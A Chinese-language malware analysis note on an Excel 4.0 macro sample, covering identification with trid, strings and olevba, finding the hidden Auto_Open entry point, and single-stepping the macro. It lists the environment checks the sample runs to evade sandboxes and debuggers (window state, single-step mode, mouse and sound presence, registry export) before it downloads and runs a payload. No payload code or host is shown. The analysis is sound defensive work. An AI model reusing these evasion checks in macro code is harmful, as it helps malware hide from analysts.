逆向工程 - 樣本分析 - Microsoft Excel 4.0 - 3fb082368a8062316976fdfeeceae130d98a3247

參考資訊：
https://github.com/decalage2/oletools

XLS

$ trid 088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9
    Collecting data from file: 088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9
        80.2% (.XLS) Microsoft Excel sheet (32500/1/3)
        19.7% (.) Generic OLE2 / Multistream Compound File (8000/1)

Excel 4.0 Macros

$ strings 088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9 | grep -i excel
    Microsoft Excel
    Excel 4.0 Macros
    Microsoft Excel 2003 Worksheet
    Excel.Sheet.8
    Microsoft Excel

Auto_Open

$ python ./olevba.py ../../088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9
    olevba 0.56.1.dev2 on Python 2.7.16 - http://decalage.info/python/oletools
    ===============================================================================
    FILE: ../../088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9
    Type: OLE
    -------------------------------------------------------------------------------
    VBA MACRO xlm_macro.txt
    in file: xlm_macro - OLE stream: 'xlm_macro'
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet1
    ' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet2
    ' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet1!GA15138
    ' 002a      2 PRINTHEADERS : Print Row/Column Labels
    ' 00fd     10 LABELSST : Cell Value, String Constant/ SST
    ' 002a      2 PRINTHEADERS : Print Row/Column Labels

P.S. 這個EntryPoint判斷錯誤

關閉Macro後，再開啟檔案


Formulas => Name Manager

P.S. 沒有EntryPoint

搜尋


Snapshot後，全部取代成Alert，這樣可以試探出EntryPoint位置


開啟Macro


EntryPoint: Sheet2!FA15138


Revert後，修改Sheet2!FA15138


按下Halt


改回原本，接著按下滑鼠右鍵


Step Into


開始使用Evaluate單步執行


APP.MAXIMIZE: Maximizes the Microsoft Excel application window


7: If window is hidden, returns TRUE; otherwise, returns FALSE.


20: If window is maximized, returns TRUE; otherwise, returns FALSE.


23: Number indicating the size of the window, (including charts): 1 = Restored, 2 = Minimized (displayed as an icon), 3 = Maximized


31: If a currently running macro is in single step mode, returns TRUE; otherwise, returns FALSE.


13: Usable workspace width, in points.


14: Usable workspace height, in points.


19: If a mouse is present, returns TRUE; otherwise, returns FALSE. In Microsoft Excel for the Macintosh, always returns TRUE.


42: If your computer is capable of playing sounds, returns TRUE; otherwise, returns FALSE.


1: Name of the environment in which Microsoft Excel is running, as text, followed by the environment's version number.


Export Registry


Registry Path


2: The version number of Microsoft Excel, as text (for example, "5.0").


導出Registry做判斷










下載Payload並且執行